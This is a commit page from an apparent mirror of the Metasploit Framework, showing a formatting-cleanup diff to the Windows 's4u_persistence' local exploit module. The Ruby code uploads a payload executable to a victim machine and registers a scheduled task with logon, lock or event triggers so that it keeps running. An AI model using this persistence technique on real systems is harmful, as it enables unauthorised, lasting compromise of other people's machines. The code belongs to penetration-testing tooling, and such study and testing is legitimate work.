infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2053, normalize s4u_persistence module

unstable
William Vu 2013-07-03 10:55:52 -05:00
parent d6f3cdc596 2a6056fd2a
commit ad83ef826c
1 changed files with 21 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
modules/exploits/windows/local/s4u_persistence.rb
View File

@ -42,19 +42,19 @@ class Metasploit3 < Msf::Exploit::Local
'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post 'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'References' => [ 'References' => [
[ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
[ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/'] [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ]
] ]
)) ))
register_options( register_options(
[ [
OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']),
OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']), OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']),
OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]),
OptString.new('REXENAME',[false, 'Name of exe on remote system']), OptString.new('REXENAME', [false, 'Name of exe on remote system']),
OptString.new('RTASKNAME',[false, 'Name of exe on remote system']), OptString.new('RTASKNAME', [false, 'Name of task on remote system']),
OptString.new('PATH',[false, 'PATH to write payload']) OptString.new('PATH', [false, 'PATH to write payload', '%TEMP%'])
], self.class) ], self.class)
register_advanced_options( register_advanced_options(
@ -108,7 +108,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Generate name for payload # Generate name for payload
# Returns name # Returns name
def generate_rexename def generate_rexename
rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
if not rexename =~ /\.exe$/ if not rexename =~ /\.exe$/
@ -119,10 +118,9 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Generate Path for payload upload # Generate Path for payload upload
# Returns path for xml and payload # Returns path for XML and payload
def generate_path(rexename) def generate_path(rexename)
# generate a path to write payload and xml # Generate a path to write payload and XML
path = datastore['PATH'] || expand_path("%TEMP%") path = datastore['PATH'] || expand_path("%TEMP%")
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
rexe_path = "#{path}\\#{rexename}" rexe_path = "#{path}\\#{rexename}"
@ -132,24 +130,25 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Upload the executable payload # Upload the executable payload
# Returns boolean for success # Returns boolean for success
def upload_rexe(path, payload) def upload_rexe(path, payload)
vprint_status("Uploading #{path}") vprint_status("Uploading #{path}")
if file? path
fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") if file? path
end fail_with(Exploit::Failure::Unknown, "File #{path} already exists... Exiting")
end
begin begin
write_file(path, payload) write_file(path, payload)
rescue => e rescue => e
fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}")
end end
print_status("Successfully uploaded remote executable to #{path}") print_status("Successfully uploaded remote executable to #{path}")
end end
############################################################## ##############################################################
# Creates a scheduled task, exports as XML, deletes task # Creates a scheduled task, exports as XML, deletes task
# Returns normal XML for generic task # Returns normal XML for generic task
def create_xml(rexe_path) def create_xml(rexe_path)
xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml") xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml")
xml_file = File.new(xml_path,"r") xml_file = File.new(xml_path,"r")
@ -162,18 +161,18 @@ class Metasploit3 < Msf::Exploit::Local
ut = vt['lpSystemTime'].unpack("v*") ut = vt['lpSystemTime'].unpack("v*")
t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
rescue rescue
print_warning("Could not read system time from victim...using your local time to determine creation date") print_warning("Could not read system time from victim... Using your local time to determine creation date")
t = ::Time.now t = ::Time.now
end end
date = t.strftime("%Y-%m-%d") date = t.strftime("%Y-%m-%d")
time = t.strftime("%H:%M:%S") time = t.strftime("%H:%M:%S")
# put in correct times # Put in correct times
xml = xml.gsub(/DATEHERE/, "#{date}T#{time}") xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")
domain, user = client.sys.config.getuid.split('\\') domain, user = client.sys.config.getuid.split('\\')
# put in user information # Put in user information
xml = xml.sub(/DOMAINHERE/, user) xml = xml.sub(/DOMAINHERE/, user)
xml = xml.sub(/USERHERE/, "#{domain}\\#{user}") xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")
@ -185,7 +184,6 @@ class Metasploit3 < Msf::Exploit::Local
# Takes the XML, alters it based on trigger specified. Will also # Takes the XML, alters it based on trigger specified. Will also
# add in expiration tag if used. # add in expiration tag if used.
# Returns the modified XML # Returns the modified XML
def add_xml_triggers(xml) def add_xml_triggers(xml)
# Insert trigger # Insert trigger
case datastore['TRIGGER'] case datastore['TRIGGER']
@ -237,7 +235,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Creates end boundary tag which expires the trigger # Creates end boundary tag which expires the trigger
# Returns XML for expire # Returns XML for expire
def create_expire_tag() def create_expire_tag()
# Get local time, not system time from victim machine # Get local time, not system time from victim machine
begin begin
@ -245,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Local
ut = vt['lpSystemTime'].unpack("v*") ut = vt['lpSystemTime'].unpack("v*")
t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
rescue rescue
print_error("Could not read system time from victim...using your local time to determine expire date") print_error("Could not read system time from victim... Using your local time to determine expire date")
t = ::Time.now t = ::Time.now
end end
@ -261,7 +258,6 @@ class Metasploit3 < Msf::Exploit::Local
# Creates trigger XML for session state triggers and replaces # Creates trigger XML for session state triggers and replaces
# the time trigger. # the time trigger.
# Returns altered XML # Returns altered XML
def create_trigger_tags(trig, xml) def create_trigger_tags(trig, xml)
domain, user = client.sys.config.getuid.split('\\') domain, user = client.sys.config.getuid.split('\\')
@ -283,7 +279,6 @@ class Metasploit3 < Msf::Exploit::Local
# Creates trigger XML for event based triggers and replaces # Creates trigger XML for event based triggers and replaces
# the time trigger. # the time trigger.
# Returns altered XML # Returns altered XML
def create_trigger_event_tags(log, line, xml) def create_trigger_event_tags(log, line, xml)
# Fscked up XML syntax for windows event #{id} in #{log}, weird spacind # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind
# used to maintain natural Windows spacing for XML export # used to maintain natural Windows spacing for XML export
@ -304,11 +299,10 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Takes the XML and a path and writes file to filesystem # Takes the XML and a path and writes file to filesystem
# Returns boolean for success # Returns boolean for success
def write_xml(xml, path, rexe_path) def write_xml(xml, path, rexe_path)
if file? path if file? path
delete_file(rexe_path) delete_file(rexe_path)
fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") fail_with(Exploit::Failure::Unknown, "File #{path} already exists... Exiting")
end end
begin begin
write_file(path, xml) write_file(path, xml)
@ -322,7 +316,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Takes path and delete file # Takes path and delete file
# Returns boolean for success # Returns boolean for success
def delete_file(path) def delete_file(path)
begin begin
file_rm(path) file_rm(path)
@ -334,7 +327,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Takes path and name for task and creates final task # Takes path and name for task and creates final task
# Returns boolean for success # Returns boolean for success
def create_task(path, schname, rexe_path) def create_task(path, schname, rexe_path)
# create task using XML file on victim fs # create task using XML file on victim fs
create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"") create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"")